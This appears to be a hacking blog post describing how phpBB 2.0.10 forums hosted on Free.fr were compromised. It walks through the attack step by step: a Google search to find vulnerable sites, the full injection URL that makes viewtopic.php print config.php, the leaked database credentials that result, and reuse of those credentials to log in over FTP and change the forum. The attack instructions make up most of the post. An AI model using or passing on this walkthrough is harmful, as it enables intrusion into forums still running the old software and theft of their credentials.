How were Forums On Free.fr Running phpBB Hacked
Saturday | Labels: Hacking | |Free.fr is a French hosting company. Many of the forums running phpBB version 2.0.10 were hacked. That was due to vulnerability in that version which was corrected in
later versions.
This articles shows an example how the vulnerability was exploited.
Searching for a forum running phpBB 2.0.10 is easy. Use google to search for "phpBB group 2.0.10" in the body and "free.fr" in the URL
I hope you know how to make google to perform these searches using special operators.
(google is the best tool ever invented for hackers, first choice for profiling phase of an attack)
Out of those result one has to look for the URL similar to this...
http://example.free.fr/phpBB2/..........
Now one goes to that forum and open any Topic. He needs to have the Topic ID of that topic. Its there is the address bar.
For example topic ID of this thread in the forum is 43
http://example.free.fr/PhpBB/viewtopic.php?t=43
In the next step one had to add
viewtopic.php?a=config.php&t=TOPICID&highlight=%2527.
readfile($HTTP_GET_VARS[a]).%2527
in the URL... So the URL now becomes
http://example.free.fr/phpBB2/viewtopic.php?a=config.php&t=
TOPICID&highlight=%2527.readfile($HTTP_GET_VARS[a]).%2527
Where TOPICID (in red ) has to be replaced with the topic ID number noted earlier.
Now the rest is simple, he has to view the source code of that page and look for the chunk
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
$dbms = 'mysql';
$dbhost = 'sql.free.fr';
$dbname = 'example';
$dbuser = 'example';
$dbpasswd = 'abcd';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>
So Now that the attacker has the Username and password of FTP account it can simply login and do whatever changes in the forum!!
The address of FTP is
ftpperso.free.fr
This vulnerability was removed in the later versions of phpBB but by that time numerous forums were hacked... even a google search today will show a long list of hacked forums.
